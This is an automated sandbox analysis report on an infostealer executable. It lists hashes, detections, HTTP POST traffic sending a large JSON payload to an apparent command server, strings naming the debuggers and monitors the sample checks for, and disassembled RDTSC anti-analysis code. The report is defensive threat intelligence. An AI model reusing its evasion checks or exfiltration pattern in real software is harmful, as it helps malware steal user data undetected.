
Windows Analysis Report
Tsy9P2T9yF.exe

Overview

General Information

Sample name: Tsy9P2T9yF.exe (renamed because original name is a hash value)
Original sample name: 03ae071235d37edc3ea30848462bccbc.exe
Analysis ID: 1578993
MD5: 03ae071235d37edc3ea30848462bccbc
SHA1: d8425df6c157fc8699596f64a0bf996692ebc947
SHA256: 72662d9e82835cb7e3210889828befd75dd7921c8bb6c45f5757c23602432536
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Tsy9P2T9yF.exe (PID: 7772 cmdline: "C:\Users\user\Desktop\Tsy9P2T9yF.exe" MD5: 03AE071235D37EDC3EA30848462BCCBC)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: Tsy9P2T9yF.exe | Avira: detected
Source: Tsy9P2T9yF.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Tsy9P2T9yF.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: -----BEGIN PUBLIC KEY----- | 0_2_004DDCF0
Source: Tsy9P2T9yF.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 0_2_0051A5B0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_0051A7F0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_0051A7F0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_0051A7F0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_0051B560
Source: Tsy9P2T9yF.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004B255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, | 0_2_004B255D
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004B29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, | 0_2_004B29FF
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic | HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: */* Content-Type: application/json Content-Length: 577602
Source: global traffic | HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: */* Content-Type: application/json Content-Length: 143 Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 34.226.108.155
Source: Joe Sandbox View | IP Address: 147.45.113.159
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0057A8C0 recvfrom, | 0_2_0057A8C0
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknown | HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: */* Content-Type: application/json Content-Length: 577602
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1491407995.00000000010EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: Tsy9P2T9yF.exe, 00000000.00000002.1491407995.00000000010EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963
Source: Tsy9P2T9yF.exe, 00000000.00000002.1491407995.00000000010EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322M
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Tsy9P2T9yF.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: Tsy9P2T9yF.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: Tsy9P2T9yF.exe, Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Tsy9P2T9yF.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715

System Summary

Source: Tsy9P2T9yF.exe | Static PE information: section name:
Source: Tsy9P2T9yF.exe | Static PE information: section name: .idata
Source: Tsy9P2T9yF.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_3_01183FF9 | 0_3_01183FF9
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004C05B0 | 0_2_004C05B0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004C6FA0 | 0_2_004C6FA0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004EF100 | 0_2_004EF100
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0057B180 | 0_2_0057B180
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0083E030 | 0_2_0083E030
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_005800E0 | 0_2_005800E0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00516210 | 0_2_00516210
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0057C320 | 0_2_0057C320
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00580420 | 0_2_00580420
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00804410 | 0_2_00804410
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004BE620 | 0_2_004BE620
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00834780 | 0_2_00834780
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0057C770 | 0_2_0057C770
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0051A7F0 | 0_2_0051A7F0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00816730 | 0_2_00816730
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004C4940 | 0_2_004C4940
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004BA960 | 0_2_004BA960
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0056C900 | 0_2_0056C900
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00686AC0 | 0_2_00686AC0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0076AAC0 | 0_2_0076AAC0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00644B60 | 0_2_00644B60
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0076AB2C | 0_2_0076AB2C
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00828BF0 | 0_2_00828BF0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004BCBB0 | 0_2_004BCBB0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0083CC70 | 0_2_0083CC70
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0082CD80 | 0_2_0082CD80
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00834D40 | 0_2_00834D40
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00670D80 | 0_2_00670D80
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_007CAE30 | 0_2_007CAE30
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00802F90 | 0_2_00802F90
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004D4F70 | 0_2_004D4F70
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0057EF90 | 0_2_0057EF90
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00578F90 | 0_2_00578F90
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004C10E6 | 0_2_004C10E6
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0081D430 | 0_2_0081D430
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_008235B0 | 0_2_008235B0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00841780 | 0_2_00841780
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00569880 | 0_2_00569880
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00809920 | 0_2_00809920
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00833A70 | 0_2_00833A70
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00821BD0 | 0_2_00821BD0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004F1BE0 | 0_2_004F1BE0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00817CC0 | 0_2_00817CC0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00769C80 | 0_2_00769C80
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004C5DB0 | 0_2_004C5DB0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004C3ED0 | 0_2_004C3ED0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004D5EB0 | 0_2_004D5EB0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00839FE0 | 0_2_00839FE0
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 004F4FD0 appears 289 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 0068CBC0 appears 90 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 004B75A0 appears 708 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 005944A0 appears 76 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 004F4F40 appears 335 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 004CCCD0 appears 54 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 004F5340 appears 48 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 004CCD40 appears 80 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 004F50A0 appears 101 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 00667220 appears 99 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 004BCAA0 appears 64 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 004B71E0 appears 47 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 004B73F0 appears 114 times
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: String function: 004BC960 appears 37 times
Source: Tsy9P2T9yF.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Tsy9P2T9yF.exe | Static PE information: Section: zxrdxyue ZLIB complexity 0.9944245741875712
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004B255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, | 0_2_004B255D
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004B29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, | 0_2_004B29FF
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Tsy9P2T9yF.exe | ReversingLabs: Detection: 60%
Source: Tsy9P2T9yF.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: Tsy9P2T9yF.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Section loaded: kernel.appcore.dll
Source: Tsy9P2T9yF.exe | Static file information: File size 4448768 > 1048576
Source: Tsy9P2T9yF.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: Tsy9P2T9yF.exe | Static PE information: Raw size of zxrdxyue is bigger than: 0x100000 < 0x1b6800

Data Obfuscation

Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Unpacked PE file: 0.2.Tsy9P2T9yF.exe.4b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zxrdxyue:EW;xhtdnoyt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zxrdxyue:EW;xhtdnoyt:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: Tsy9P2T9yF.exe | Static PE information: real checksum: 0x4494a3 should be: 0x44a648
Source: Tsy9P2T9yF.exe | Static PE information: section name:
Source: Tsy9P2T9yF.exe | Static PE information: section name: .idata
Source: Tsy9P2T9yF.exe | Static PE information: section name:
Source: Tsy9P2T9yF.exe | Static PE information: section name: zxrdxyue
Source: Tsy9P2T9yF.exe | Static PE information: section name: xhtdnoyt
Source: Tsy9P2T9yF.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_3_011ACB2C push 78011ACBh; retf | 0_3_011ACB31
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_008341D0 push eax; mov dword ptr [esp], edx | 0_2_008341D5
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00532340 push eax; mov dword ptr [esp], 00000000h | 0_2_00532343
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0056C7F0 push eax; mov dword ptr [esp], 00000000h | 0_2_0056C743
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_004F0AC0 push eax; mov dword ptr [esp], 00000000h | 0_2_004F0AC4
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00511430 push eax; mov dword ptr [esp], 00000000h | 0_2_00511433
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_005339A0 push eax; mov dword ptr [esp], 00000000h | 0_2_005339A3
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_0050DAD0 push eax; mov dword ptr [esp], edx | 0_2_0050DAD1
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Code function: 0_2_00839F40 push dword ptr [eax+04h]; ret | 0_2_00839F6F
Source: Tsy9P2T9yF.exe | Static PE information: section name: zxrdxyue entropy: 7.955163779925324

Boot Survival

Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
Source: Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: C41E8E second address: C41E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: C41E92 second address: C41E9C instructions: 0x00000000 rdtsc 0x00000002 je 00007F804C8F2D9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: C4B17C second address: C4B180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: C4B180 second address: C4B1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F804C8F2DA8h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: C4B1A3 second address: C4B1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F804CF71E76h 0x0000000c jl 00007F804CF71E76h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: C4B1B6 second address: C4B1BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: C4B1BD second address: C4B1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: C4DF65 second address: C4DF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F804C8F2D96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: C4DF6F second address: C4DF90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b adc dx, 6AE1h 0x00000010 push 00000000h 0x00000012 adc si, 7B5Ah 0x00000017 push 6C9560E6h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exe | RDTSC instruction interceptor: First address: C4DF90 second address: C4E042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F804C8F2DA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F804C8F2D9Bh 0x0000000f jno 00007F804C8F2D96h 0x00000015 popad 0x00000016 popad 0x00000017 xor dword ptr [esp], 6C956066h 0x0000001e jmp 00007F804C8F2D9Fh 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push 00000003h 0x00000029 mov ecx, dword ptr [ebp+122D189Dh] 0x0000002f push A68B317Bh 0x00000034 jmp 00007F804C8F2DA7h 0x00000039 add dword ptr [esp], 1974CE85h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F804C8F2D98h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000014h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a lea ebx, dword ptr [ebp+12453E5Ah] 0x00000060 jmp 00007F804C8F2D9Bh 0x00000065 push eax 0x00000066 jng 00007F804C8F2DA2h 0x0000006c jc 00007F804C8F2D9Ch 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E071 second address: C4E097 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F804CF71E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F804CF71E88h 0x00000013 rdtsc
